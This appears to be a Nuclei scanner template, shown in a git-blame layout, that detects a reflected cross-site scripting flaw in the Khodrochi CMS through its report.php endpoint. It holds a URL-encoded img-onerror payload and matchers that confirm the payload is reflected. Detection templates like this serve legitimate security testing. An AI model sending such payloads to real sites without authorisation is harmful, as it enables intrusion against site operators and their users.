2023-10-17 07:20:28 +00:00
|
|
|
id: khodrochi-cms-xss
|
|
|
|
|
|
|
|
|
|
info:
|
2023-10-17 08:16:05 +00:00
|
|
|
name: Khodrochi CMS - Cross Site Scripting
|
2023-10-17 07:20:28 +00:00
|
|
|
author: r3Y3r53
|
|
|
|
|
severity: medium
|
|
|
|
|
description: |
|
|
|
|
|
A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.
|
2023-10-17 08:16:05 +00:00
|
|
|
reference:
|
2023-10-17 07:20:28 +00:00
|
|
|
- https://www.exploitalert.com/view-details.html?id=38723
|
|
|
|
|
- https://cxsecurity.com/ascii/WLB-2022050087
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
2023-10-17 17:52:26 +00:00
|
|
|
max-request: 1
|
2023-10-17 07:20:28 +00:00
|
|
|
tags: khodrochi,cms,xss
|
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E"
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
|
|
|
|
- 'status_code == 200'
|
|
|
|
|
- 'contains(header, "text/html")'
|
|
|
|
|
- 'contains(body, "class=\"cons_form") && contains(body, "><img src=x onerror=prompt(document.domain)>")'
|
|
|
|
|
condition: and
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
|
# digest: 490a004630440220121afca0421cca463af791b4154dc5eeed6ce29890024ee34971701da5940ab002200b9cfeb79edc16f92026849bc8ce918f28530ee2f22aaf15621438af6ed6158b:922c64590222798bb761d5b6d8e72950
|
